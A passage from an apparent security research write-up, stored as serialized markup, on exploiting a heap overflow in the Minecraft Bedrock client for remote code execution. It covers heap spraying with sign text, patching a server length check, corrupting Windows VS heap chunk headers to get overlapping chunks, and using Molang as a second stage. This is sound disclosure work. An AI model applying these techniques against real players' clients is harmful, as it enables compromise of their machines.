6953},[155611],{"type":31,"value":13547},{"type":25,"tag":216,"props":155613,"children":155614},{"style":6964},[155615],{"type":31,"value":15728},{"type":25,"tag":216,"props":155617,"children":155618},{"class":6922,"line":27870},[155619],{"type":25,"tag":216,"props":155620,"children":155621},{"style":6964},[155622],{"type":31,"value":7302},{"type":25,"tag":216,"props":155624,"children":155625},{"class":6922,"line":27879},[155626],{"type":25,"tag":216,"props":155627,"children":155628},{"style":6964},[155629],{"type":31,"value":7311},{"type":25,"tag":216,"props":155631,"children":155632},{"class":6922,"line":36243},[155633],{"type":25,"tag":216,"props":155634,"children":155635},{"style":6964},[155636],{"type":31,"value":7874},{"type":25,"tag":216,"props":155638,"children":155639},{"class":6922,"line":36264},[155640],{"type":25,"tag":216,"props":155641,"children":155642},{"emptyLinePlaceholder":16},[155643],{"type":31,"value":7642},{"type":25,"tag":216,"props":155645,"children":155646},{"class":6922,"line":84923},[155647,155652,155656,155661,155665,155670,155674,155679,155683,155688,155692,155696],{"type":25,"tag":216,"props":155648,"children":155649},{"style":6947},[155650],{"type":31,"value":155651},"world",{"type":25,"tag":216,"props":155653,"children":155654},{"style":6964},[155655],{"type":31,"value":179},{"type":25,"tag":216,"props":155657,"children":155658},{"style":6947},[155659],{"type":31,"value":155660},"afterEvents",{"type":25,"tag":216,"props":155662,"children":155663},{"style":6964},[155664],{"type":31,"value":179},{"type":25,"tag":216,"props":155666,"children":155667},{"style":6947},[155668],{"type":31,"value":155669},"playerSpawn",{"type":25,"tag":216,"props":155671,"children":155672},{"style":6964},[155673],{"type":31,"value":179},{"type":25,"tag":216,"props":155675,"children":155676},{"style":7047},[155677],{"type":31,"value":155678},"subscribe",{"type":25,"tag":216,"props":155680,"children":155681},{"style":6964},[155682],{"type":31,"value":35485},{"type":25,"tag":216,"props":155684,"children":155685},{"style":6947},[155686],{"type":31,"value":155687},"arg",{"type":25,"tag":216,"props":155689,"children":155690},{"style":6964},[155691],{"type":31,"value":7036},{"type":25,"tag":216,"props":155693,"children":155694},{"style":6936},[155695],{"type":31,"value":18779},{"type":25,"tag":216,"props":155697,"children":155698},{"style":6964},[155699],{"type":31,"value":7241},{"type":25,"tag":216,"props":155701,"children":155702},{"class":6922,"line":84936},[155703,155708],{"type":25,"tag":216,"props":155704,"children":155705},{"style":7047},[155706],{"type":31,"value":155707},"    create_wall",{"type":25,"tag":216,"props":155709,"children":155710},{"style":6964},[155711],{"type":31,"value":7633},{"type":25,"tag":216,"props":155713,"children":155714},{"class":6922,"line":84944},[155715],{"type":25,"tag":216,"props":155716,"children":155717},{"style":6964},[155718],{"type":31,"value":39301},{"type":25,"tag":216,"props":155720,"children":155721},{"class":6922,"line":84952},[155722],{"type":25,"tag":216,"props":155723,"children":155724},{"emptyLinePlaceholder":16},[155725],{"type":31,"value":7642},{"type":25,"tag":216,"props":155727,"children":155728},{"class":6922,"line":84960},[155729,155733,155737,155742,155746,155751,155755,155759,155763,155767,155771,155775,155779,155783],{"type":25,"tag":216,"props":155730,"children":155731},{"style":6947},[155732],{"type":31,"value":155651},{"type":25,"tag":216,"props":155734,"children":155735},{"style":6964},[155736],{"type":31,"value":179},{"type":25,"tag":216,"props":155738,"children":155739},{"style":6947},[155740],{"type":31,"value":155741},"beforeEvents",{"type":25,"tag":216,"props":155743,"children":155744},{"style":6964},[155745],{"type":31,"value":179},{"type":25,"tag":216,"props":155747,"children":155748},{"style":6947},[155749],{"type":31,"value":155750},"playerLeave",{"type":25,"tag":216,"props":155752,"children":155753},{"style":6964},[155754],{"type":31,"value":179},{"type":25,"tag":216,"props":155756,"children":155757},{"style":7047},[155758],{"type":31,"value":155678},{"type":25,"tag":216,"props":155760,"children":155761},{"style":6964},[155762],{"type":31,"value":1850},{"type":25,"tag":216,"props":155764,"children":155765},{"style":6936},[155766],{"type":31,"value":40108},{"type":25,"tag":216,"props":155768,"children":155769},{"style":6964},[155770],{"type":31,"value":7016},{"type":25,"tag":216,"props":155772,"children":155773},{"style":6947},[155774],{"type":31,"value":155687},{"type":25,"tag":216,"props":155776,"children":155777},{"style":6964},[155778],{"type":31,"value":7036},{"type":25,"tag":216,"props":155780,"children":155781},{"style":6936},[155782],{"type":31,"value":18779},{"type":25,"tag":216,"props":155784,"children":155785},{"style":6964},[155786],{"type":31,"value":7241},{"type":25,"tag":216,"props":155788,"children":155789},{"class":6922,"line":85000},[155790,155795],{"type":25,"tag":216,"props":155791,"children":155792},{"style":7047},[155793],{"type":31,"value":155794},"    remove_wall",{"type":25,"tag":216,"props":155796,"children":155797},{"style":6964},[155798],{"type":31,"value":7633},{"type":25,"tag":216,"props":155800,"children":155801},{"class":6922,"line":85008},[155802],{"type":25,"tag":216,"props":155803,"children":155804},{"style":6964},[155805],{"type":31,"value":39301},{"type":25,"tag":38,"props":155807,"children":155808},{},[155809],{"type":31,"value":155810},"This works well and produces a structure that the client ideally should not render - displaying and repeatedly updating this many signs during the spray would stall the client, which we want to avoid.",{"type":25,"tag":38,"props":155812,"children":155813},{},[155814],{"type":25,"tag":6467,"props":155815,"children":155818},{"alt":155816,"src":155817},"image-min","/posts/minecraft-heap-overflow-to-rce/image3.png",[],{"type":25,"tag":38,"props":155820,"children":155821},{},[155822],{"type":31,"value":155823},"Preventing the client from rendering the sign wall is as simple as adjusting player’s view angle each tick, essentially forcing the client to look in the opposite direction of the sign wall.",{"type":25,"tag":630,"props":155825,"children":155827},{"id":155826},"a-small-roadblock",[155828],{"type":31,"value":155829},"A Small Roadblock",{"type":25,"tag":38,"props":155831,"children":155832},{},[155833],{"type":31,"value":155834},"While testing our heap spray method, we encountered the following error:",{"type":25,"tag":206,"props":155836,"children":155838},{"code":155837},"[Scripting] Error: Provided message is too long.\nMax length is 512 and the provided message has length of 1024.\n    at alloc (index.js:169)\n",[155839],{"type":25,"tag":82,"props":155840,"children":155841},{"__ignoreMap":7},[155842],{"type":31,"value":155837},{"type":25,"tag":38,"props":155844,"children":155845},{},[155846,155848,155854],{"type":31,"value":155847},"An error is thrown by the server executable while trying to assign text longer than ",{"type":25,"tag":82,"props":155849,"children":155851},{"className":155850},[],[155852],{"type":31,"value":155853},"512",{"type":31,"value":155855}," bytes to a sign. This severely limits our approach, as it prevents us from spraying the VS heap with large chunks needed for the mentioned chunk-overlap technique.",{"type":25,"tag":38,"props":155857,"children":155858},{},[155859],{"type":31,"value":155860},"Before abandoning the idea entirely, we considered one possibility: perhaps this check only occurs server-side, and the client might not validate the length of the data it receives.",{"type":25,"tag":38,"props":155862,"children":155863},{},[155864],{"type":31,"value":155865},"We searched for the error message in the Bedrock server executable and located the length-validation logic:",{"type":25,"tag":38,"props":155867,"children":155868},{},[155869],{"type":25,"tag":6467,"props":155870,"children":155872},{"alt":54547,"src":155871},"/posts/minecraft-heap-overflow-to-rce/image4.png",[],{"type":25,"tag":38,"props":155874,"children":155875},{},[155876,155878,155884],{"type":31,"value":155877},"Although the involved functions are unnamed, it’s clear that we always want execution to take the ",{"type":25,"tag":82,"props":155879,"children":155881},{"className":155880},[],[155882],{"type":31,"value":155883},"string_length \u003C= 512",{"type":31,"value":155885}," branch, regardless of the actual length. Otherwise, the error is thrown and the client never allocates the desired chunk.",{"type":25,"tag":38,"props":155887,"children":155888},{},[155889],{"type":31,"value":155890},"The disassembly of the comparison looks like this:",{"type":25,"tag":38,"props":155892,"children":155893},{},[155894],{"type":25,"tag":6467,"props":155895,"children":155897},{"alt":54547,"src":155896},"/posts/minecraft-heap-overflow-to-rce/image5.png",[],{"type":25,"tag":38,"props":155899,"children":155900},{},[155901,155903,155908,155910,155915,155916,155921,155923,155929,155931,155937,155939,155944,155946,155951],{"type":31,"value":155902},"The code compares ",{"type":25,"tag":82,"props":155904,"children":155906},{"className":155905},[],[155907],{"type":31,"value":60742},{"type":31,"value":155909}," (the string length) to ",{"type":25,"tag":82,"props":155911,"children":155913},{"className":155912},[],[155914],{"type":31,"value":131746},{"type":31,"value":7016},{"type":25,"tag":82,"props":155917,"children":155919},{"className":155918},[],[155920],{"type":31,"value":155853},{"type":31,"value":155922}," decimal). It then performs a ",{"type":25,"tag":82,"props":155924,"children":155926},{"className":155925},[],[155927],{"type":31,"value":155928},"jbe",{"type":31,"value":155930},", jumping to address ",{"type":25,"tag":82,"props":155932,"children":155934},{"className":155933},[],[155935],{"type":31,"value":155936},"0x14275114c",{"type":31,"value":155938}," if ",{"type":25,"tag":82,"props":155940,"children":155942},{"className":155941},[],[155943],{"type":31,"value":60742},{"type":31,"value":155945}," is less than or equal to ",{"type":25,"tag":82,"props":155947,"children":155949},{"className":155948},[],[155950],{"type":31,"value":155853},{"type":31,"value":155952},". That target location contains the logic that instructs the client to update the sign text - the branch we want to reach every time.",{"type":25,"tag":38,"props":155954,"children":155955},{},[155956,155958,155963,155965,155971],{"type":31,"value":155957},"To force execution down this path, we patched the ",{"type":25,"tag":82,"props":155959,"children":155961},{"className":155960},[],[155962],{"type":31,"value":155928},{"type":31,"value":155964}," instruction to an unconditional ",{"type":25,"tag":82,"props":155966,"children":155968},{"className":155967},[],[155969],{"type":31,"value":155970},"jmp",{"type":31,"value":155972},", ensuring the correct branch is always taken, regardless of the comparison result.",{"type":25,"tag":38,"props":155974,"children":155975},{},[155976],{"type":25,"tag":6467,"props":155977,"children":155979},{"alt":54547,"src":155978},"/posts/minecraft-heap-overflow-to-rce/image6.png",[],{"type":25,"tag":38,"props":155981,"children":155982},{},[155983,155985,155990,155992,155997],{"type":31,"value":155984},"After patching the server and calling ",{"type":25,"tag":82,"props":155986,"children":155988},{"className":155987},[],[155989],{"type":31,"value":154094},{"type":31,"value":155991}," with a size of ",{"type":25,"tag":82,"props":155993,"children":155995},{"className":155994},[],[155996],{"type":31,"value":62116},{"type":31,"value":155998},", the operation now executes successfully, and the client happily allocates a chunk of that size:",{"type":25,"tag":38,"props":156000,"children":156001},{},[156002],{"type":25,"tag":6467,"props":156003,"children":156005},{"alt":54547,"src":156004},"/posts/minecraft-heap-overflow-to-rce/image7.png",[],{"type":25,"tag":22753,"props":156007,"children":156008},{},[],{"type":25,"tag":38,"props":156010,"children":156011},{},[156012],{"type":31,"value":156013},"Having a way to spray the heap is great - we can now use the previously mentioned technique to create overlapping chunks in the VS heap, or use it to shape the LFH so that the 4-byte overflow can overwrite an internal Minecraft structure.",{"type":25,"tag":38,"props":156015,"children":156016},{},[156017],{"type":31,"value":156018},"At the time, we couldn't find any useful Minecraft structures to abuse with just a 4-byte OOB write, so we worked on getting overlapping chunks instead.",{"type":25,"tag":606,"props":156020,"children":156022},{"id":156021},"overlapping-heap-chunks",[156023],{"type":31,"value":156024},"Overlapping Heap Chunks",{"type":25,"tag":38,"props":156026,"children":156027},{},[156028,156030,156035],{"type":31,"value":156029},"The attack is described in detail in the referenced blog post (",{"type":25,"tag":162,"props":156031,"children":156033},{"href":153838,"rel":156032},[166],[156034],{"type":31,"value":51553},{"type":31,"value":156036},"), so we will present a high-level overview.",{"type":25,"tag":38,"props":156038,"children":156039},{},[156040,156042,156048],{"type":31,"value":156041},"The core idea is to insert a large chunk that overlaps other chunks above it into the free list. To understand this, some basic knowledge of ",{"type":25,"tag":82,"props":156043,"children":156045},{"className":156044},[],[156046],{"type":31,"value":156047},"_HEAP_VS_CHUNK_HEADER",{"type":31,"value":156049}," structure layout is required:",{"type":25,"tag":206,"props":156051,"children":156053},{"code":156052},"     +---------------------------+           +---------------+\n+0x0 |_HEAP_VS_CHUNK_HEADER_SIZE +----> +0x0 |MemoryCost     |\n     +---------------------------+           +---------------+\n+0x8 |EncodedSegmentPageOffset   |      +0x2 |UnsafeSize     |\n     +---------------------------+           +---------------+\n+0x8 |UnusedBytes                |      +0x4 |UnsafePrevSize |\n     +---------------------------+           +---------------+\n     |           . . .           |      +0x6 |Allocated      |\n                                             +---------------+\n                                             |     . . .     |\n",[156054],{"type":25,"tag":82,"props":156055,"children":156056},{"__ignoreMap":7},[156057],{"type":31,"value":156052},{"type":25,"tag":38,"props":156059,"children":156060},{},[156061,156063,156069,156071,156077,156078,156084,156085,156091,156093,156098,156100,156105,156107,156113,156115,156120,156122,156128],{"type":31,"value":156062},"At offset 0 there is a header ",{"type":25,"tag":82,"props":156064,"children":156066},{"className":156065},[],[156067],{"type":31,"value":156068},"_HEAP_VS_CHUNK_HEADER_SIZE",{"type":31,"value":156070}," containing fields such as ",{"type":25,"tag":82,"props":156072,"children":156074},{"className":156073},[],[156075],{"type":31,"value":156076},"MemoryCost",{"type":31,"value":7026},{"type":25,"tag":82,"props":156079,"children":156081},{"className":156080},[],[156082],{"type":31,"value":156083},"UnsafeSize",{"type":31,"value":7026},{"type":25,"tag":82,"props":156086,"children":156088},{"className":156087},[],[156089],{"type":31,"value":156090},"UnsafePrevSize",{"type":31,"value":156092},", etc. For the attack we only care about the ",{"type":25,"tag":82,"props":156094,"children":156096},{"className":156095},[],[156097],{"type":31,"value":156083},{"type":31,"value":156099}," field: it holds the size of the chunk as its value. Specifically the value is size divided by ",{"type":25,"tag":82,"props":156101,"children":156103},{"className":156102},[],[156104],{"type":31,"value":130369},{"type":31,"value":156106},", so for a chunk of size ",{"type":25,"tag":82,"props":156108,"children":156110},{"className":156109},[],[156111],{"type":31,"value":156112},"0x4010",{"type":31,"value":156114}," the value of ",{"type":25,"tag":82,"props":156116,"children":156118},{"className":156117},[],[156119],{"type":31,"value":156083},{"type":31,"value":156121}," would be ",{"type":25,"tag":82,"props":156123,"children":156125},{"className":156124},[],[156126],{"type":31,"value":156127},"0x401",{"type":31,"value":179},{"type":25,"tag":38,"props":156130,"children":156131},{},[156132,156133,156138],{"type":31,"value":68185},{"type":25,"tag":82,"props":156134,"children":156136},{"className":156135},[],[156137],{"type":31,"value":156083},{"type":31,"value":156139}," field is a 2-byte field located at offset 0x2 relative to the header. Because of that, it can be fully overwritten by the final two bytes of the 4-byte OOB write.",{"type":25,"tag":38,"props":156141,"children":156142},{},[156143,156145,156150,156152,156157,156159,156165,156167,156172],{"type":31,"value":156144},"The field is encoded with a random key that we do not know, so the exact bytes which we overwrite it with don't matter and the size after will be random. That said, by overwriting ",{"type":25,"tag":82,"props":156146,"children":156148},{"className":156147},[],[156149],{"type":31,"value":156083},{"type":31,"value":156151}," in the smallest possible VS chunk (",{"type":25,"tag":82,"props":156153,"children":156155},{"className":156154},[],[156156],{"type":31,"value":156112},{"type":31,"value":156158},"), we maximize the probability that the decoded size becomes larger than the original. Since the decoded size will be anywhere in ",{"type":25,"tag":82,"props":156160,"children":156162},{"className":156161},[],[156163],{"type":31,"value":156164},"[0x10, 0xffff0]",{"type":31,"value":156166}," range, the probability that it exceeds ",{"type":25,"tag":82,"props":156168,"children":156170},{"className":156169},[],[156171],{"type":31,"value":156112},{"type":31,"value":156173}," is:",{"type":25,"tag":206,"props":156175,"children":156177},{"code":156176},"1 - ((0x4010 - 0x10) / (0xffff0 - 0x10)) ~= 98.4%\n",[156178],{"type":25,"tag":82,"props":156179,"children":156180},{"__ignoreMap":7},[156181],{"type":31,"value":156176},{"type":25,"tag":38,"props":156183,"children":156184},{},[156185],{"type":31,"value":156186},"Thus, there is roughly a 98% chance that the resulting decoded size will be larger than the original chunk size.",{"type":25,"tag":38,"props":156188,"children":156189},{},[156190],{"type":31,"value":156191},"Considering there are slight differences between the kernel and userland heap, and that maximizing the success rate of the attack doesn't matter as much for purposes of this writeup, we will do a simplified attack to the one in the referenced blogpost.",{"type":25,"tag":630,"props":156193,"children":156195},{"id":156194},"overlap-attack-overview",[156196],{"type":31,"value":156197},"Overlap Attack Overview",{"type":25,"tag":38,"props":156199,"children":156200},{},[156201,156203,156208],{"type":31,"value":156202},"The goal of the attack is to overwrite the first four bytes of the VS chunk header that we control - in this case the allocation that holds sign text. We then call ",{"type":25,"tag":82,"props":156204,"children":156206},{"className":156205},[],[156207],{"type":31,"value":130392},{"type":31,"value":156209}," on the overwritten chunk so it is inserted into the free list as an overly large chunk, which we can use to create overlaps.",{"type":25,"tag":38,"props":156211,"children":156212},{},[156213,156215,156220,156222,156227],{"type":31,"value":156214},"We don't know the remote client's exact heap layout, but it likely contains ",{"type":25,"tag":82,"props":156216,"children":156218},{"className":156217},[],[156219],{"type":31,"value":152097},{"type":31,"value":156221},"-sized chunks in the free list that we want to avoid. If a ",{"type":25,"tag":82,"props":156223,"children":156225},{"className":156224},[],[156226],{"type":31,"value":152097},{"type":31,"value":156228},"-sized free chunk is used, the 4-byte OOB write could clobber some unknown chunk above it that we don’t control.",{"type":25,"tag":38,"props":156230,"children":156231},{},[156232,156234,156239],{"type":31,"value":156233},"To remove those ",{"type":25,"tag":82,"props":156235,"children":156237},{"className":156236},[],[156238],{"type":31,"value":152097},{"type":31,"value":156240},"-sized chunks from the free list we allocate many signs of that size. The allocator will first reuse free-list entries and then create new regions when the free list is exhausted.",{"type":25,"tag":38,"props":156242,"children":156243},{},[156244],{"type":31,"value":156245},"After draining the free list, we spray the VS heap with many more chunks of the same size. If the free list has been emptied, most of these allocations will be contiguous, producing many adjacent sign allocations like:",{"type":25,"tag":206,"props":156247,"children":156249},{"code":156248},"+--------+--------+--------+--------+--------+\n|        |        |        |        |        |\n| Sign A | Sign B | Sign C | Sign D | Sign F |\n|        |        |        |        |        |\n+--------+--------+--------+--------+--------+\n",[156250],{"type":25,"tag":82,"props":156251,"children":156252},{"__ignoreMap":7},[156253],{"type":31,"value":156248},{"type":25,"tag":38,"props":156255,"children":156256},{},[156257,156259,156264,156266,156271],{"type":31,"value":156258},"Next we create ",{"type":25,"tag":64,"props":156260,"children":156261},{},[156262],{"type":31,"value":156263},"holes",{"type":31,"value":156265}," in the contiguous spray by freeing every other sign allocation. That inserts ",{"type":25,"tag":82,"props":156267,"children":156269},{"className":156268},[],[156270],{"type":31,"value":152097},{"type":31,"value":156272},"-sized free chunks where we want them - directly below allocated sign chunks:",{"type":25,"tag":206,"props":156274,"children":156276},{"code":156275},"            Free              Free            \n+--------+--------+--------+--------+--------+\n|        |........|        |........|        |\n| Sign A |........| Sign C |........| Sign F |\n|        |........|        |........|        |\n+--------+--------+--------+--------+--------+\n",[156277],{"type":25,"tag":82,"props":156278,"children":156279},{"__ignoreMap":7},[156280],{"type":31,"value":156275},{"type":25,"tag":38,"props":156282,"children":156283},{},[156284,156286,156291,156293,156298],{"type":31,"value":156285},"When a ",{"type":25,"tag":82,"props":156287,"children":156289},{"className":156288},[],[156290],{"type":31,"value":152097},{"type":31,"value":156292}," allocation is later requested, the allocator will likely satisfy it from one of our inserted holes. As a result, the next adjacent allocated chunk’s ",{"type":25,"tag":82,"props":156294,"children":156296},{"className":156295},[],[156297],{"type":31,"value":156083},{"type":31,"value":156299}," field will be overwritten:",{"type":25,"tag":206,"props":156301,"children":156303},{"code":156302},"                           +--------+         \n            Free           |        |         \n+--------+--------+--------+ g->out +--------+\n|        |........|        |        |        |\n| Sign A |........| Sign C +--------+ Sign F |\n|        |........|        |        |        |\n+--------+--------+--------+        +--------+\n",[156304],{"type":25,"tag":82,"props":156305,"children":156306},{"__ignoreMap":7},[156307],{"type":31,"value":156302},{"type":25,"tag":38,"props":156309,"children":156310},{},[156311,156313,156318,156320,156325,156327,156332],{"type":31,"value":156312},"Once ",{"type":25,"tag":82,"props":156314,"children":156316},{"className":156315},[],[156317],{"type":31,"value":156083},{"type":31,"value":156319}," has been overwritten, ",{"type":25,"tag":82,"props":156321,"children":156323},{"className":156322},[],[156324],{"type":31,"value":152097},{"type":31,"value":156326}," allocation is freed immediately after, restoring the previous layout but with ",{"type":25,"tag":82,"props":156328,"children":156330},{"className":156329},[],[156331],{"type":31,"value":156083},{"type":31,"value":156333}," field corrupted:",{"type":25,"tag":206,"props":156335,"children":156337},{"code":156336},"                              UnsafeSize Overwritten\n                                        ^           \n                                        |           \n            Free              Free      |           \n+--------+--------+--------+--------+---+----+      \n|        |........|        |........|        |      \n| Sign A |........| Sign C |........| Sign F |      \n|        |........|        |........|        |      \n+--------+--------+--------+--------+--------+      \n",[156338],{"type":25,"tag":82,"props":156339,"children":156340},{"__ignoreMap":7},[156341],{"type":31,"value":156336},{"type":25,"tag":38,"props":156343,"children":156344},{},[156345],{"type":31,"value":156346},"To avoid adjacent-chunk consolidation in the next phase, we spray additional signs to fill the holes inside our contiguous region:",{"type":25,"tag":206,"props":156348,"children":156350},{"code":156349},"                              UnsafeSize Overwritten\n                                        ^           \n                                        |           \n                                        |           \n+--------+--------+--------+--------+---+----+      \n|        |        |        |        |        |      \n| Sign A | Sign B | Sign C | Sign D | Sign F |      \n|        |        |        |        |        |      \n+--------+--------+--------+--------+--------+      \n",[156351],{"type":25,"tag":82,"props":156352,"children":156353},{"__ignoreMap":7},[156354],{"type":31,"value":156349},{"type":25,"tag":38,"props":156356,"children":156357},{},[156358],{"type":31,"value":156359},"Finally, we free the rest of the contiguous spray. One of the freed allocations will have a corrupted (and likely overly large) size, giving us a much larger overflow:",{"type":25,"tag":206,"props":156361,"children":156363},{"code":156362},"                                       Freed Overwritten   \n                                               |           \n                                    +----------+----------+\n                                    |                     |\n   Free              Free           v                     v\n+--------+--------+--------+--------+--------+- - - - - - -\n|........|        |........|        |........|             \n|........| Sign B |........| Sign D |........| Other chunks\n|........|        |........|        |........|             \n+--------+--------+--------+--------+--------+- - - - - - -\n",[156364],{"type":25,"tag":82,"props":156365,"children":156366},{"__ignoreMap":7},[156367],{"type":31,"value":156362},{"type":25,"tag":22753,"props":156369,"children":156370},{},[],{"type":25,"tag":38,"props":156372,"children":156373},{},[156374],{"type":31,"value":156375},"This yields a substantially larger overflow primitive than the original 4-byte OOB. However, without an information leak, ASLR is still a big issue and finding a single ideal structure was difficult.",{"type":25,"tag":38,"props":156377,"children":156378},{},[156379],{"type":31,"value":156380},"Instead of looking for simple structures, we shifted focus to more complex server-controlled scripting systems executed by the client - eventually finding Molang.",{"type":25,"tag":606,"props":156382,"children":156384},{"id":156383},"molang",[156385],{"type":31,"value":156386},"Molang",{"type":25,"tag":38,"props":156388,"children":156389},{},[156390,156392,156399],{"type":31,"value":156391},"Molang is a Minecraft-specific scripting language designed for simple math operations and a lightweight state model. It typically controls client-side entity animations and can be included in resource packs delivered by the server. A high-level overview is available in the official ",{"type":25,"tag":162,"props":156393,"children":156396},{"href":156394,"rel":156395},"https://learn.microsoft.com/en-us/minecraft/creator/documents/molang/syntax-guide?view=minecraft-bedrock-stable",[166],[156397],{"type":31,"value":156398},"syntax guide",{"type":31,"value":179},{"type":25,"tag":38,"props":156401,"children":156402},{},[156403,156405,156410,156411,156416],{"type":31,"value":156404},"The available base types are simple: numbers are 32-bit floats, and there is a string type for which only the ",{"type":25,"tag":82,"props":156406,"children":156408},{"className":156407},[],[156409],{"type":31,"value":12528},{"type":31,"value":1307},{"type":25,"tag":82,"props":156412,"children":156414},{"className":156413},[],[156415],{"type":31,"value":19646},{"type":31,"value":156417}," operators are supported.",{"type":25,"tag":38,"props":156419,"children":156420},{},[156421,156423,156429,156431,156436,156438,156443,156444,156449,156450],{"type":31,"value":156422},"Variables are defined by prepending ",{"type":25,"tag":82,"props":156424,"children":156426},{"className":156425},[],[156427],{"type":31,"value":156428},"variable.",{"type":31,"value":156430}," to the name and assigning a value. For example, to define ",{"type":25,"tag":82,"props":156432,"children":156434},{"className":156433},[],[156435],{"type":31,"value":13037},{"type":31,"value":156437}," as the sum of ",{"type":25,"tag":82,"props":156439,"children":156441},{"className":156440},[],[156442],{"type":31,"value":162},{"type":31,"value":1307},{"type":25,"tag":82,"props":156445,"children":156447},{"className":156446},[],[156448],{"type":31,"value":7171},{"type":31,"value":19288},{"type":25,"tag":82,"props":156451,"children":156453},{"className":156452},[],[156454],{"type":31,"value":156455},"variable.result = variable.a + variable.b;",{"type":25,"tag":38,"props":156457,"children":156458},{},[156459,156461,156466,156467,156472,156473,156478,156479,156484],{"type":31,"value":156460},"Logical operators such as ",{"type":25,"tag":82,"props":156462,"children":156464},{"className":156463},[],[156465],{"type":31,"value":26364},{"type":31,"value":7026},{"type":25,"tag":82,"props":156468,"children":156470},{"className":156469},[],[156471],{"type":31,"value":77167},{"type":31,"value":7026},{"type":25,"tag":82,"props":156474,"children":156476},{"className":156475},[],[156477],{"type":31,"value":9757},{"type":31,"value":7026},{"type":25,"tag":82,"props":156480,"children":156482},{"className":156481},[],[156483],{"type":31,"value":5902},{"type":31,"value":156485},", etc., are supported, and conditional branching is implemented using ternary-style blocks:",{"type":25,"tag":206,"props":156487,"children":156489},{"code":156488},"(variable.result == 3) ? {\n    return 1;\n} : {\n    return 0;\n}\n",[156490],{"type":25,"tag":82,"props":156491,"children":156492},{"__ignoreMap":7},[156493],{"type":31,"value":156488},{"type":25,"tag":38,"props":156495,"children":156496},{},[156497],{"type":31,"value":156498},"As shown, Molang is very simple, but we hoped it would be sufficient as a second-stage payload to achieve client-side arbitrary read and write.",{"type":25,"tag":630,"props":156500,"children":156502},{"id":156501},"molang-internals",[156503],{"type":31,"value":156504},"Molang Internals",{"type":25,"tag":38,"props":156506,"children":156507},{},[156508],{"type":31,"value":156509},"What interested us most was how variables are handled. Specifically, we wondered whether we could use the overflow to corrupt a variable and then leverage that corrupted variable to perform arbitrary reads - leaking the information needed to bypass ASLR inside the Molang script, and subsequently use those leaks to carry out arbitrary writes.",{"type":25,"tag":38,"props":156511,"children":156512},{},[156513],{"type":31,"value":156514},"Below we describe the structures involved and their memory layout.",{"type":25,"tag":630,"props":156516,"children":156518},{"id":156517},"molangvariable-and-molangscriptarg",[156519],{"type":31,"value":156520},"MolangVariable and MolangScriptArg",{"type":25,"tag":38,"props":156522,"children":156523},{},[156524,156525,156531],{"type":31,"value":106309},{"type":25,"tag":82,"props":156526,"children":156528},{"className":156527},[],[156529],{"type":31,"value":156530},"MolangVariable",{"type":31,"value":156532}," structure is created for every declared variable. Simplified, it looks something like this:",{"type":25,"tag":206,"props":156534,"children":156536},{"code":156535,"language":2254,"meta":7,"className":20473,"style":7},"struct MolangVariable {\n    \n    struct HashedString {\n        uint64_t variable_name_hash;\n        std::string variable_name;\n    };\n    \n    struct MolangScriptArg {\n        uint32_t value_type;\n        uint64_t value;\n        std::vector\u003Cstruct MolangScriptArg> struct_fields;\n        \n        [...]\n    };\n};\n",[156537],{"type":25,"tag":82,"props":156538,"children":156539},{"__ignoreMap":7},[156540,156552,156559,156571,156584,156592,156599,156606,156618,156631,156643,156673,156681,156688,156695],{"type":25,"tag":216,"props":156541,"children":156542},{"class":6922,"line":6923},[156543,156547],{"type":25,"tag":216,"props":156544,"children":156545},{"style":6936},[156546],{"type":31,"value":13357},{"type":25,"tag":216,"props":156548,"children":156549},{"style":6964},[156550],{"type":31,"value":156551}," MolangVariable {\n",{"type":25,"tag":216,"props":156553,"children":156554},{"class":6922,"line":6769},[156555],{"type":25,"tag":216,"props":156556,"children":156557},{"style":6964},[156558],{"type":31,"value":65754},{"type":25,"tag":216,"props":156560,"children":156561},{"class":6922,"line":6778},[156562,156566],{"type":25,"tag":216,"props":156563,"children":156564},{"style":6936},[156565],{"type":31,"value":10003},{"type":25,"tag":216,"props":156567,"children":156568},{"style":6964},[156569],{"type":31,"value":156570}," HashedString {\n",{"type":25,"tag":216,"props":156572,"children":156573},{"class":6922,"line":7005},[156574,156579],{"type":25,"tag":216,"props":156575,"children":156576},{"style":6936},[156577],{"type":31,"value":156578},"        uint64_t",{"type":25,"tag":216,"props":156580,"children":156581},{"style":6964},[156582],{"type":31,"value":156583}," variable_name_hash;\n",{"type":25,"tag":216,"props":156585,"children":156586},{"class":6922,"line":7110},[156587],{"type":25,"tag":216,"props":156588,"children":156589},{"style":6964},[156590],{"type":31,"value":156591},"        std::string variable_name;\n",{"type":25,"tag":216,"props":156593,"children":156594},{"class":6922,"line":7216},[156595],{"type":25,"tag":216,"props":156596,"children":156597},{"style":6964},[156598],{"type":31,"value":42960},{"type":25,"tag":216,"props":156600,"children":156601},{"class":6922,"line":7244},[156602],{"type":25,"tag":216,"props":156603,"children":156604},{"style":6964},[156605],{"type":31,"value":65754},{"type":25,"tag":216,"props":156607,"children":156608},{"class":6922,"line":7257},[156609,156613],{"type":25,"tag":216,"props":156610,"children":156611},{"style":6936},[156612],{"type":31,"value":10003},{"type":25,"tag":216,"props":156614,"children":156615},{"style":6964},[156616],{"type":31,"value":156617}," MolangScriptArg {\n",{"type":25,"tag":216,"props":156619,"children":156620},{"class":6922,"line":7275},[156621,156626],{"type":25,"tag":216,"props":156622,"children":156623},{"style":6936},[156624],{"type":31,"value":156625},"        uint32_t",{"type":25,"tag":216,"props":156627,"children":156628},{"style":6964},[156629],{"type":31,"value":156630}," value_type;\n",{"type":25,"tag":216,"props":156632,"children":156633},{"class":6922,"line":7296},[156634,156638],{"type":25,"tag":216,"props":156635,"children":156636},{"style":6936},[156637],{"type":31,"value":156578},{"type":25,"tag":216,"props":156639,"children":156640},{"style":6964},[156641],{"type":31,"value":156642}," value;\n",{"type":25,"tag":216,"props":156644,"children":156645},{"class":6922,"line":7305},[156646,156651,156655,156659,156664,156668],{"type":25,"tag":216,"props":156647,"children":156648},{"style":6964},[156649],{"type":31,"value":156650},"        std::vector",{"type":25,"tag":216,"props":156652,"children":156653},{"style":6953},[156654],{"type":31,"value":9757},{"type":25,"tag":216,"props":156656,"children":156657},{"style":6936},[156658],{"type":31,"value":13357},{"type":25,"tag":216,"props":156660,"children":156661},{"style":6964},[156662],{"type":31,"value":156663}," MolangScriptArg",{"type":25,"tag":216,"props":156665,"children":156666},{"style":6953},[156667],{"type":31,"value":5902},{"type":25,"tag":216,"props":156669,"children":156670},{"style":6964},[156671],{"type":31,"value":156672}," 